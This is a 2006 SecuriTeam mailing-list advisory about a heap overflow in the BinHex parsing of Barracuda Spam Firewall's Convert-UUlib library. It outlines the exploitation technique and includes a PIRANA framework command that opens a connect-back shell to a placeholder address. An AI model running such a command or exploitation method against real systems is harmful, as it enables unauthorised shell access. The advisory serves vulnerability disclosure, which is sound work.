From: SecuriTeam <support@securiteam.com.>
To: list@securiteam.com
Date: 6 Dec 2006 17:06:25 +0200
Subject: [UNIX] Barracuda Spam Firewall Convert-UUlib Library Buffer Overflow
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20061206144719.D45BF582F@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Barracuda Spam Firewall Convert-UUlib Library Buffer Overflow
------------------------------------------------------------------------
SUMMARY
The <http://www.barracudanetworks.com/>; Barracuda Spam Firewall is an
integrated hardware and software solution for complete protection of your
email server. It provides a powerful, easy to use, and affordable solution
to eliminating spam and virus from your organization.
A vulnerability in Barracuda Spam Firewall allows a malicious attacker to
gain shell access to the remote Barracuda Spam Firewall.
DETAILS
Vulnerable Systems:
* Barracuda Firewall with firmware releases before versions 3.3.15.026.
The flaw is in the part of the code where BinHex files were getting
parsed. By supplying an invalid size for the resource fork or data fork in
a BinHex's file header, it is possible to create a heap overflow.
By taking advantage of the sequentials calls to free(), it's possible to
overwrite more than 4 bytes. In fact, we can write a jmpcode in memory
that will jump to one of our registers containing the location of our
shellcode. By using this technique, the exploit will be much more
reliable. You will only need to supply a return location address to the
exploit code.
You do NOT need to have remote administration access (on port 8000) for
successfull exploitation.
For further informations about the details of the bugs, check the exploit
code.
Proof of concept:
Using the PIRANA framework, available at <http://www.guay-leroux.com>;
http://www.guay-leroux.com , it is possible to test the Barracuda Spam
Firewall against the Convert-UUlib vulnerability.
The version 0.3.1 of the PIRANA framework incorporates a new module to
exploit the Convert-UUlib library bug. It contains three hardcoded offsets
that should reliably exploit every Barracuda Spam Firewall with a firmware
below 3.3.15.026 and virus definition below 2.0.325.
By calling PIRANA the way it is described below, you will get a TCP
connect back shell on IP address 1.2.3.4 and port 1234:
perl pirana.pl -e 5 -h barracuda.vulnerable.com -a postmaster -s 0 \ -l
1.2.3.4 -p 1234
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1349>;
CVE-2005-1349
Disclosure Timeline:
* 2005-04-26 - Bug is disclosed by Mark Martinec and Robert Lewis.
* 2006-08-?? - Convert-UUlib module exploit written for PIRANA.
* 2006-11-28 - Barracuda Networks is notified about the problem.
* 2006-11-28 - Barracuda Networks acknowledged the problem.
* 2006-11-29 - Barracuda Networks published a fix.
* 2006-12-05 - Advisory is disclosed to the public.
ADDITIONAL INFORMATION
The information has been provided by
<mailto:jean-sebastien@guay-leroux.com.> Jean-S bastien Guay-Leroux.
The original article can be found at:
<http://www.guay-leroux.com/projects/barracuda-advisory-convert-uulib.txt>;
http://www.guay-leroux.com/projects/barracuda-advisory-convert-uulib.txt
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
